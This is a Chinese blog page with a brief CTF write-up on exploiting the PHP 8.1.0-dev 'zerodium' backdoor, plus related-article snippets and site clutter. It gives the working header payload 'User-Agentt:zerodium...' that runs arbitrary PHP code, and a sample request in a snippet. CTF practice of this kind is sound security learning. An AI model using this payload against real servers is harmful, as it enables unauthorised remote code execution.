PHP/8.1.0-dev 后门命令执行漏洞复现

最新推荐文章于 2024-03-08 19:54:51 发布
最新推荐文章于 2024-03-08 19:54:51 发布
阅读量1.6k 收藏 2
点赞数 2
文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63253040/article/details/127037026
版权

地址:

青少年CTF训练平台 | 原中学生CTF平台 | 青少年CTF

进入环境

没有发现什么点,目录扫描也没有结果,打开bp抓包

 结合题目提示

题目描述:题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。

搜索PHP/8.1.0-dev

 在请求头添加

User-Agentt:zerodiumvar_dump(2*3);

 一开始这里我有个空格在:后面,所以执行不成功,去掉空格就成功了

 直接getflag

 

白塔河冲浪手
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
最新版windows mysql-8.1.0-winx64.zip
08-02
最新版windows mysql-8.1.0-winx64.zip最新版windows mysql-8.1.0-winx64.zip最新版windows mysql-8.1.0-winx64.zip最新版windows mysql-8.1.0-winx64.zip
PHP 8.1.0-dev 开发版本后门事件
EC_Carrot的博客
07-18 469
漏洞背景 PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 漏洞 发送如下数据包,可见代码var_dump(233*233);成功执行: GET / HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0
青少年CTF-PHP后门
最新发布
CTF
03-08 462
打开容器后发,就是php后门漏洞类的,发送给repeater,并添加代码执行,有线索,发flag文件,直接进行查看。
PHP-8.1.0-dev 后门命令执行漏洞
Shadow_DAI_990101的博客
09-08 2059
想必大家都了解,这里就不过多赘述了没啥可说的,是一个无聊的漏洞
PHP 8.1.0-dev后门
weixin_46137328的博客
01-18 1675
0x01 简介PHP verion 8.1.0-dev于2021年3月28日被植入后门,但是后门很快被发并删除。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来...
PHP 8.1.0-dev 开发版本后门
Jaky5320的博客
05-31 302
0x00:简介    PHP 8.1.0-dev 开发版本在2021年3月28日被植入后门,但是后门很快被发并修正。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来执行任意代码。0x01:搭建环境https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor然后访问本地地址http://127.0.0.1:8080/0x02:漏洞神秘代码#!/usr/bin/env python3 im
i686-8.1.0-release-posix-dwarf-rt_v6-rev0.7z
06-30
MinGW-W64的32位安装包:i686-8.1.0-release-posix-dwarf-rt_v6-rev0.7z ,支持GCC8.1.0,线程模型为posix,异常处理模型为dwarf, 解压后即可使用。 mingw-w64 版本选择方法: 32位系统选择i686, 64位系统选择x86_...
i686-8.1.0-release-posix-sjlj-rt_v6-rev0.7z
08-06
MinGW-W64的32位安装包:i686-8.1.0-release-posix-sjlj-rt_v6-rev0.7z支持GCC8.1.0, 解压后即可使用。 利用下载工具下载的也是此压缩包,然后解压缩而已。 方便没梯子的!!!!
MinGW(x86_64-8.1.0-release-posix-sjlj-rt_v6-rev0.7z)
03-24
MinGW(x86_64-8.1.0-release-posix-sjlj-rt_v6-rev0.7z)
X86_64-8.1.0-release-posix-seh-rt_v6_rev0.7z
08-06
MinGW-W64的64位安装包: X86_64-8.1.0-release-posix-seh-rt_v6_rev0.7z 支持GCC8.1.0, 解压后即可使用。 利用下载工具下载的也是此压缩包,然后解压缩而已。 方便没梯子的!!!!
PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)
X_IT666的博客
07-28 1195
漏洞介绍 关于漏洞PHP 8.1.0-dev 后门远程命令执行漏洞 PHP verion 8.1.0-devPHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。 影响版本:PHP 8.1.0-dev 配置环境: 靶机:centos8 攻击机:kali 其他:vulhub -->php–>8.1-backdoor 漏洞攻击思路: 扫描端口,确定开启的服务,漏洞寻找,漏洞利用 信息收集 nmap扫描端口 访问http://192.168
青少年CTF、PHP后门PHP/8.1.0-dev漏洞
weixin_69830800的博客
11-15 1808
题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行
phpstudy后门代码利用及分析
feichang2的博客
10-04 1867
几天前火绒说我的PHPstudy有马,我以为是误报没有在意,但接着我就在知乎上看到了PHPstudy真可能有后门,于是赶紧看了一下,还真有,是我之前下的2016版的,而我在官网下的2019的phpstudy_pro没有问题 可以看到php-5.2.17/ext/php_xmlrpc.dll和php-5.4.45/ext/php_xmlrpc.dll里有可疑的@eval字符,看来是有一句话了 根据...
通过一个远程溢出漏洞后门的操作
weixin_44045581的博客
03-22 1013
通过一个远程溢出漏洞后门的操作PCManFTP v2.0(CVE-2013-4730)漏洞分析1. 软件简介2. 漏洞成因3. 利用过程4.PoC PCManFTP v2.0(CVE-2013-4730)漏洞分析 软件名称:PCManFTP 软件版本:2.0 漏洞模块:PCManFTPD2.exe 模块版本:2.0.0.0 编译日期:2005-01-01 操作系统:Windows 7 漏洞编...
PHP zerodium后门漏洞
xxx9686的博客
09-20 619
提交的请求包中,如果字符串以'zerodium'开头,那么该行将从useragent HTTP标头(“ HTTP_USER_AGENTT”)中执行PHP代码。
百晓生教你露一手系列----怎样利用WINDOW漏洞设置后门
weixin_34366546的博客
08-29 207
原理: 使用粘滞键功能(连按5下shift),调出cmd命令符,修改登陆密码。1.1)在系统文件夹(windows)下找到system32文件夹鼠标右键盘点选该文件夹,选择最下面的属性点击进入如下图所示。2)选择安全,高级,点击确定如下图所示。3)将所有者改为Administrators,点击下方的替换子容器和对象的所有者,点击确定,如下图所示。4)再次进入system32文件夹属性选项,选择安全...
C:/Program Files/mingw-w64/x86_64-8.1.0-posix-seh-rt_v6-rev0/mingw64/bin/../lib/gcc/x86_64-w64-mingw32/8.1.0/../../../../x86_64-w64-mingw32/lib/../lib/libmingw32.a(lib64_libmingw32_a-crt0_c.o):crt0_c.c:(.text.startup+0x2e): undefined reference to `WinMain' collect2.exe: error: ld returned 1 exit status
07-24
这个错误通常是因为在Windows上使用了错误的入口点(entry point)导致的。在Windows上,C程序的入口点应该是`int main()`而不是`WinMain`。请确保您的代码中有正确的`int main()`函数,并且没有定义`WinMain`函数。 以下是一个简单的示例程序,用于计算n个数字的总和,您可以尝试运行它: ```c #include <stdio.h> #include <omp.h> int main() { int n = 1000000; // 输入要计算总和的数字个数 int* numbers = (int*)malloc(n * sizeof(int)); // 初始化数字数组 for (int i = 0; i < n; i++) { numbers[i] = i + 1; } // 使用OpenMP reduction子句的算法 double start_time = omp_get_wtime(); int sum1 = 0; #pragma omp parallel for reduction(+:sum1) for (int i = 0; i < n; i++) { sum1 += numbers[i]; } double end_time = omp_get_wtime(); printf("使用OpenMP reduction子句的总和: %d\n", sum1); printf("使用OpenMP reduction子句的运行时间: %lf 秒\n", end_time - start_time); // 让每个线程计算部分总和并累加的算法 start_time = omp_get_wtime(); int num_threads = omp_get_max_threads(); int* partial_sums = (int*)malloc(num_threads * sizeof(int)); #pragma omp parallel { int thread_id = omp_get_thread_num(); int num_elements_per_thread = n / num_threads; int start = thread_id * num_elements_per_thread; int end = start + num_elements_per_thread; int partial_sum = 0; for (int i = start; i < end; i++) { partial_sum += numbers[i]; } partial_sums[thread_id] = partial_sum; #pragma omp barrier if (thread_id == 0) { int sum2 = 0; for (int i = 0; i < num_threads; i++) { sum2 += partial_sums[i]; } end_time = omp_get_wtime(); printf("使用每个线程计算部分总和并累加的总和: %d\n", sum2); printf("使用每个线程计算部分总和并累加的运行时间: %lf 秒\n", end_time - start_time); } } free(numbers); free(partial_sums); return 0; } ``` 请确保您的代码中包含了正确的`int main()`函数,并且没有定义`WinMain`函数。如果问题仍然存在,请提供您的代码,我将尽力帮助您解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值